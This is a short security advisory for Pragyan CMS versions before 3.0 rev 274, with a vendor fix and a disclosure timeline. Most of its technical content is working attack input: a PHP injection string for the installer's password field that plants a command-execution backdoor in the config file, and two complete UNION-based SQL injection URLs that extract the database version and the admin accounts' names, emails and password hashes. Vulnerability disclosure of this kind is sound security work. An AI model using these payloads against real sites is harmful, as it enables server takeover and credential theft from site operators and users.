Pragyan CMS versions prior to 3.0 rev 274 suffer from code execution and remote SQL injection vulnerabilities.
8b9afe976dfc4540c9079a9bb30cb84209dbd90c3bd9da57324bcd80fe2a9762
*Affected Software*
Pragyan CMS
Product Link: http://sourceforge.net/projects/pragyan/
Technical Description
1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibly write at password field string:
");echo exec($_GET["a"]);echo ("
or in another fields with turned of javascript.
in cms/config.inc.php will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allow command execution.
2) sql injection
- get mysql version
http://host/+view&thread_id=-1 UNION ALL SELECT
null,null,null,null,concat(unhex(Hex(cast(@@version as
char)))),null,null,null--
- get admin account
http://host/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT
concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as
char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT
0,1),null,null,null--
Solution
update to Pragyan CMS 3.0 rev.274
Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclose
Credits
Abhishek Lyall <http://aslitsecurity.blogspot.com/>
pragyan.org
http://egoistka.org.ua/
--------------------
Best wishes,
villy
http://bugix-security.blogspot.com/